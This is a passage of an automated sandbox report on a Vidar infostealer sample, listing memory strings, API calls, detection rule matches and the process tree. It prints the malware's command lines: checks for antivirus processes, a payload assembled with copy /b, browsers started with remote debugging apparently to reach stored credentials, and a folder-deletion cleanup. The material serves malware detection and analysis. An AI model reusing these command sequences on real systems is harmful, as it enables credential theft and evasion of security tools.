          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
          Source: msedge.exe, 00000013.00000003.2671795095.000039F800284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2671553359.000039F800280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/AddSession
          Source: msedge.exe, 00000013.00000003.2671795095.000039F800284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2671553359.000039F800280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/Logout
          Source: msedge.exe, 00000013.00000003.2671795095.000039F800284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2671553359.000039F800280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen9
          Source: msedge.exe, 00000013.00000003.2671795095.000039F800284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2671553359.000039F800280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/MergeSession
          Source: msedge.exe, 00000013.00000003.2671795095.000039F800284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2671553359.000039F800280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/OAuthLogin
          Source: msedge.exe, 00000013.00000003.2671795095.000039F800284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2671553359.000039F800280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
          Source: msedge.exe, 00000013.00000003.2671795095.000039F800284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2671553359.000039F800280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
          Source: msedge.exe, 00000013.00000003.2671795095.000039F800284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2671553359.000039F800280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
          Source: msedge.exe, 00000013.00000003.2671795095.000039F800284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2671553359.000039F800280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
          Source: msedge.exe, 00000013.00000003.2671795095.000039F800284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2671553359.000039F800280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
          Source: msedge.exe, 00000013.00000003.2671795095.000039F800284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2671553359.000039F800280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
          Source: msedge.exe, 00000013.00000003.2671795095.000039F800284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2671553359.000039F800280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
          Source: msedge.exe, 00000013.00000003.2671795095.000039F800284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2671553359.000039F800280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
          Source: msedge.exe, 00000013.00000003.2671795095.000039F800284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2671553359.000039F800280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
          Source: msedge.exe, 00000013.00000003.2671795095.000039F800284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2671553359.000039F800280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/v1/issuetoken9
          Source: chrome.exe, 0000000F.00000003.2555478690.000003C8010E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
          Source: chrome.exe, 0000000F.00000003.2557362056.000003C80120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2557574273.000003C8012E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2557118101.000003C801090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2556904309.000003C801090000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
          Source: chrome.exe, 0000000F.00000003.2555478690.000003C8010E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://policies.google.com/
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
          Source: chrome.exe, 0000000F.00000003.2583555211.000003C801874000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
          Source: chrome.exe, 0000000F.00000003.2583555211.000003C801874000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
          Source: chrome.exe, 0000000F.00000003.2583555211.000003C801874000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
          Source: chrome.exe, 0000000F.00000003.2583555211.000003C801874000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
          Source: chrome.exe, 0000000F.00000003.2583555211.000003C801874000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
          Source: chrome.exe, 0000000F.00000003.2583555211.000003C801874000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2
          Source: chrome.exe, 0000000F.00000003.2583555211.000003C801874000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comJv
          Source: chrome.exe, 0000000F.00000003.2583555211.000003C801874000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comb
          Source: chrome.exe, 0000000F.00000003.2578653549.000003C801694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2577610339.000003C801668000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2577470556.000003C801658000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2577531707.000003C801660000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2578234940.000003C8015A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2578323378.000003C8015BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
          Source: Fine.com, 0000000B.00000002.2943022245.0000000006C06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
          Source: Fine.com, 0000000B.00000002.2943022245.0000000006C06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
          Source: Fine.com, 0000000B.00000003.2441321400.0000000000E8D000.00000004.00000020.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2935633690.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2937261877.0000000004010000.00000004.00000800.00020000.00000000.sdmp, Fine.com, 0000000B.00000003.2441368651.0000000004035000.00000004.00000800.00020000.00000000.sdmp, Fine.com, 0000000B.00000003.2441264032.0000000004313000.00000004.00000800.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2939843523.0000000004311000.00000040.00001000.00020000.00000000.sdmp, Fine.com, 0000000B.00000003.2441646535.00000000040BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/detct0r
          Source: unknown HTTPS traffic detected: 195.201.141.106:443 -> 192.168.2.5:49851 version: TLS 1.2
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exe Code function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com Code function: 11_2_0024F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,11_2_0024F7C7
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com Code function: 11_2_0024F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,11_2_0024F55C
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exe Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com Code function: 11_2_00269FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,11_2_00269FD2

          System Summary

          Source: 11.2.Fine.com.4310000.1.unpack, type: UNPACKEDPE Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com Code function: 11_2_00244763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,11_2_00244763
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com Code function: 11_2_00231B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,11_2_00231B4D
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exe Code function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_004038AF
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com Code function: 11_2_0023F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,11_2_0023F20D
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exe File created: C:\Windows\ItunesTruth
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exe File created: C:\Windows\IntermediateEuros
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exe File created: C:\Windows\BoatingMauritius
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exe File created: C:\Windows\OppositionHell
          Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\424372\Fine.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exe Code function: String function: 004062CF appears 58 times
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com Code function: String function: 001F0DA0 appears 46 times
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com Code function: String function: 001EFD52 appears 40 times
          Source: mNPTwHOuvT.exe Static PE information: invalid certificate
          Source: mNPTwHOuvT.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 11.2.Fine.com.4310000.1.unpack, type: UNPACKEDPE Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
          Source: mNPTwHOuvT.exe Static PE information: Section: .rsrc ZLIB complexity 0.9954628519492574
          Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@89/291@27/18
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com Code function: 11_2_002441FA GetLastError,FormatMessageW,11_2_002441FA
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com Code function: 11_2_00232010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,11_2_00232010
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com Code function: 11_2_00231A0B AdjustTokenPrivileges,CloseHandle,11_2_00231A0B
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exe Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com Code function: 11_2_0023DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,11_2_0023DD87
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exe Code function: 0_2_004024FB CoCreateInstance,0_2_004024FB
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com Code function: 11_2_00243A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,11_2_00243A0E
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\DX903NAN.htm
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8000:120:WilError_03
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6380:120:WilError_03
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exe File created: C:\Users\user\AppData\Local\Temp\nsu2018.tmp
          Source: mNPTwHOuvT.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exe File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: Fine.com, 0000000B.00000002.2938149780.0000000004284000.00000004.00000800.00020000.00000000.sdmp, HDTJW4E37.11.dr, 1VSRIWTJM.11.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: mNPTwHOuvT.exe Virustotal: Detection: 58%
          Source: mNPTwHOuvT.exe ReversingLabs: Detection: 47%
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exe File read: C:\Users\user\Desktop\mNPTwHOuvT.exe
          Source: unknown Process created: C:\Users\user\Desktop\mNPTwHOuvT.exe "C:\Users\user\Desktop\mNPTwHOuvT.exe"
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Lou Lou.cmd & Lou.cmd
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 424372
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "SYDNEY" Webmasters
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Hero + ..\Spell + ..\Pensions + ..\Wants + ..\Mars U
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\424372\Fine.com Fine.com U
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=2136,i,8109458833846669920,3799157795582322690,262144 /prefetch:8
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
          Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2708 --field-trial-handle=2636,i,9989964858448437683,7276448006416970456,262144 /prefetch:3
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2304 --field-trial-handle=2104,i,17487451398241360211,6191727004034532126,262144 /prefetch:3
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=3672 --field-trial-handle=2104,i,17487451398241360211,6191727004034532126,262144 /prefetch:8
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=5256 --field-trial-handle=2104,i,17487451398241360211,6191727004034532126,262144 /prefetch:8
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\PP89HD2DTRQQ" & exit
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=1136 --field-trial-handle=2104,i,17487451398241360211,6191727004034532126,262144 /prefetch:8
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exe Section loaded: apphelp.dll, version.dll, kernel.appcore.dll, uxtheme.dll, shfolder.dll, windows.storage.dll, wldp.dll, propsys.dll, iconcodecservice.dll, windowscodecs.dll, riched20.dll, usp10.dll, msls31.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, textshaping.dll, profapi.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
          Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll, apphelp.dll
          Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll, mpr.dll, framedynos.dll, dbghelp.dll, sspicli.dll, srvcli.dll, netutils.dll, kernel.appcore.dll, wbemcomn.dll, winsta.dll, amsi.dll, userenv.dll, profapi.dll
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com Section loaded: wsock32.dll, version.dll, winmm.dll, mpr.dll, wininet.dll, iphlpapi.dll, userenv.dll, uxtheme.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, mswsock.dll, dnsapi.dll, winrnr.dll, rasadhlp.dll, sspicli.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, dbghelp.dll, iertutil.dll, profapi.dll, ondemandconnroutehelper.dll, winhttp.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll, schannel.dll, mskeyprotect.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncryptsslp.dll, fwpuclnt.dll, ntmarta.dll, windowscodecs.dll, propsys.dll, windows.fileexplorer.common.dll, apphelp.dll, ntshrui.dll, cscapi.dll, windows.staterepositoryps.dll, linkinfo.dll, edputil.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, pcacli.dll, sfc_os.dll
          Source: C:\Windows\SysWOW64\choice.exe Section loaded: version.dll
          Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
          Source: Google Drive.lnk.15.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: YouTube.lnk.15.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Sheets.lnk.15.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Gmail.lnk.15.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Slides.lnk.15.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Docs.lnk.15.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Window Recorder Window detected: More than 3 window changes detected
          Source: mNPTwHOuvT.exe Static file information: File size 1352826 > 1048576
          Source: mNPTwHOuvT.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exe Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
          Source: mNPTwHOuvT.exe Static PE information: real checksum: 0x155729 should be: 0x14ba81
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com Code function: 11_2_00220315 push cs; retn 0021h 11_2_00220318
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com Code function: 11_2_001F0DE6 push ecx; ret 11_2_001F0DF9

          Persistence and Installation Behavior

          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\424372\Fine.comJump to dropped file

          Boot Survival

          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_002626DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,11_2_002626DD
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_001EFC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,11_2_001EFC7C
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
